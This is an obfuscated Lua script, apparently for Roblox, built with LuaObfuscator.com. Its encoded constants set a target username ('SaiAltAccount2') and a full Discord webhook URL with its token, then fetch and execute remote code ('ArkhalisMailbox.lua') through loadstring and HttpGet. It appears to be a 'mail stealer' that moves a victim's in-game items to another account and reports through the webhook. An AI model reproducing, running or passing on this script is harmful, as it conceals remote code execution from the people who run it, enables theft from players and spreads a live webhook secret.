--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v81,v19);v19=nil;v87=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(((1068 -(68 + 997)) -(1271 -(226 + 1044)))^(((v33-(2 -1)) -(v32-(620 -((2416 -1861) + 64)))) + ((995 -(32 + 85)) -(282 + 595)))) ;return v82-(v82%1) ;else local v83=(933 -(857 + 74))^(v32-(1 + 0)) ;return (((v31%(v83 + v83))>=v83) and (569 -(360 + 7 + 45 + 156))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v36 * (610 -354)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v40 * (16777566 -(87 + 263))) + (v39 * (65716 -((164 -97) + 113))) + (v38 * (188 + 51 + 17)) + v37 ;end local function v24()local v41=1486 -(998 + 488) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==2) then v46=v20(v43,83 -62 ,983 -(255 + 547 + 150) );v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or 1 ;v41=1000 -(750 + 165 + 82) ;end if (v41==(2 -1)) then v44=1 + 0 ;v45=(v20(v43,(773 -(201 + 571)) -0 ,20) * (2^((2357 -(116 + 1022)) -(1069 + 118)))) + v42 ;v41=4 -2 ;end if (v41==(6 -3)) then if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=791 -(368 + 423) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -(8 -6))/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-((1918 + 1348) -2243) ) * (v44 + (v45/((1 + 1)^((332 -241) -(138 -99))))) ;end if (v41==(438 -(145 + (1152 -(814 + 45))))) then v42=v23();v43=v23();v41=431 -((108 -64) + 386) ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=886 -(261 + 624) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==3) then v58=nil;while true do local v89=0 + 0 ;while true do if (v89==(652 -(494 + 157))) then if (v52~=3) then else local v98=0 -0 ;while true do if (v98==(0 + 0)) then for v139=1,v23() do v54[v139-(1 + 0) ]=v28();end return v56;end end end if (v52~=2) then else local v99=0;while true do if (v99==(1 + 0)) then for v141=1,v23() do local v142=0;local v143;local v144;while true do if (1~=v142) then else while true do if (v143~=0) then else v144=v21();if (v20(v144,1,837 -(660 + 176) )~=(0 + 0)) then else local v173=0;local v174;local v175;local v176;local v177;while true do if (v173~=(202 -(14 + 188))) then else v174=675 -(534 + 141) ;v175=nil;v173=1 + 0 ;end if (v173~=(2 + 0)) then else while true do if (v174==(0 + 0)) then v175=v20(v144,3 -1 ,4 -1 );v176=v20(v144,11 -7 ,6);v174=1;end if (v174==(2 + 1)) then if (v20(v176,2 + 1 ,3)==1) then v177[4]=v58[v177[4]];end v53[v141]=v177;break;end if (v174~=(398 -(115 + 281))) then else local v179=0 -0 ;while true do if (v179~=(1 + 0)) then else v174=3;break;end if (v179==0) then if (v20(v176,2 -1 ,1)~=1) then else v177[7 -5 ]=v58[v177[2]];end if (v20(v176,2,2)==(868 -(550 + 317))) then v177[3 -0 ]=v58[v177[3]];end v179=1 -0 ;end end end if (v174~=(2 -1)) then else local v180=0;local v181;while true do if (0==v180) then v181=0;while true do if (v181~=(285 -(134 + 151))) then else local v188=0;while true do if (v188~=(1665 -(970 + 695))) then else v177={v22(),v22(),nil,nil};if (v175==(0 -0)) then local v189=1824 -(1195 + 629) ;local v190;local v191;while true do if (v189==(1 -0)) then while true do if ((241 -(187 + 54))~=v190) then else v191=780 -(162 + 618) ;while true do if (v191~=0) then else v177[3 + 0 ]=v22();v177[3 + 1 ]=v22();break;end end break;end end break;end if ((0 -0)==v189) then v190=0;v191=nil;v189=1 -0 ;end end elseif (v175==1) then v177[1 + 2 ]=v23();elseif (v175==(1638 -(1373 + 263))) then v177[1003 -(451 + 549) ]=v23() -((1 + 1)^16) ;elseif (v175==(4 -1)) then local v194=0 -0 ;local v195;while true do if (v194~=0) then else v195=0;while true do if (v195~=0) then else v177[3]=v23() -((1386 -(746 + 638))^(7 + 9)) ;v177[4]=v22();break;end end break;end end end v188=1;end if (v188~=1) then else v181=1 -0 ;break;end end end if (v181~=(342 -(218 + 123))) then else v174=1583 -(1535 + 46) ;break;end end break;end end end end break;end if (v173==1) then v176=nil;v177=nil;v173=2 + 0 ;end end end break;end end break;end if (v142==(0 + 0)) then local v166=560 -(306 + 254) ;while true do if (v166~=1) then else v142=1 + 0 ;break;end if (v166==(0 -0)) then v143=0;v144=nil;v166=1;end end end end end v52=1470 -(899 + 568) ;break;end if (v99==(0 + 0)) then local v137=0 -0 ;while true do if (v137==1) then v99=604 -(268 + 335) ;break;end if (v137~=(290 -(60 + 230))) then else for v167=1,v57 do local v168=572 -(426 + 146) ;local v169;local v170;while true do if (0==v168) then local v171=0;while true do if (v171==0) then v169=v21();v170=nil;v171=1 + 0 ;end if (v171==1) then v168=1;break;end end end if (v168~=(1457 -(282 + 1174))) then else if (v169==(812 -(569 + 242))) then v170=v21()~=(0 -0) ;elseif (v169==(1 + 1)) then v170=v24();elseif (v169==3) then v170=v25();end v58[v167]=v170;break;end end end v56[1027 -(706 + 318) ]=v21();v137=1252 -(721 + 530) ;end end end end end break;end if ((1271 -(945 + 326))~=v89) then else if (v52~=(2 -1)) then else local v100=0;while true do if (v100==(0 + 0)) then v56={v53,v54,nil,v55};v57=v23();v100=1;end if (1==v100) then v58={};v52=1088 -(461 + 625) ;break;end end end if (v52~=0) then else local v101=1288 -(993 + 295) ;while true do if (v101==0) then v53={};v54={};v101=1;end if (v101==(1 + 0)) then v55={};v52=1;break;end end end v89=1172 -(418 + 753) ;end end end break;end if ((1 + 0)~=v51) then else v54=nil;v55=nil;v51=2;end if (v51==2) then v56=nil;v57=nil;v51=1 + 2 ;end if (v51==(0 + 0)) then v52=0 + 0 ;v53=nil;v51=1;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=6) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v61[v79[3]];elseif (v80>1) then v71=v79[3];else local v103=v79[2];local v104,v105=v70(v77[v103](v13(v77,v103 + 1 ,v79[3])));v72=(v105 + v103) -1 ;local v106=0;for v130=v103,v72 do local v131=0;while true do if (v131==0) then v106=v106 + 1 ;v77[v130]=v104[v106];break;end end end end elseif (v80<=4) then if (v80==3) then local v107=0;local v108;while true do if (v107==0) then v108=v79[2];v77[v108]=v77[v108](v13(v77,v108 + 1 ,v72));break;end end else do return;end end elseif (v80==5) then v77[v79[2]]=v79[3]~=0 ;elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=9) then if (v80<=7) then v77[v79[2]]=v79[3];elseif (v80==8) then v61[v79[3]]=v77[v79[2]];else v77[v79[2]]();end elseif (v80<=11) then if (v80==10) then for v132=v79[2],v79[3] do v77[v132]=nil;end else local v112;local v113,v114;local v115;local v116;v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v116=v79[2];v115=v77[v79[3]];v77[v116 + 1 ]=v115;v77[v116]=v115[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v116=v79[2];v113,v114=v70(v77[v116](v13(v77,v116 + 1 ,v79[3])));v72=(v114 + v116) -1 ;v112=0;for v134=v116,v72 do v112=v112 + 1 ;v77[v134]=v113[v112];end v71=v71 + 1 ;v79=v67[v71];v116=v79[2];v77[v116]=v77[v116](v13(v77,v116 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80==12) then local v126=0;while true do if (2==v126) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v126=3;end if (v126==1) then v71=v71 + 1 ;v79=v67[v71];v61[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v126=2;end if (v126==3) then v71=v79[3];break;end if (v126==0) then v61[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v126=1;end end else local v127=0;local v128;local v129;while true do if (1==v127) then v77[v128 + 1 ]=v129;v77[v128]=v129[v79[4]];break;end if (v127==0) then v128=v79[2];v129=v77[v79[3]];v127=1;end end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365724E616D65030E3O00536169416C74412O636F756E743203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O383639383139343830312O363534302F382O486A743553565870737475345344735F52514B584B71584636674F5059467167364C30767136354F455675726E4B4E654B375764512O6133425447532D504244454F001B3O0012073O00014O000A000100013O0026063O0002000100010004023O00020001001207000100013O00260600010010000100020004023O0010000100122O000200033O00120B000300043O00202O00030003000500122O000500066O000600016O000300066O00023O00024O00020001000100044O001A000100260600010005000100010004023O00050001001207000200083O00120C000200073O00122O0002000A3O00122O000200093O00122O000100023O00044O000500010004023O001A00010004023O000200012O00043O00017O00",v9(),...);end
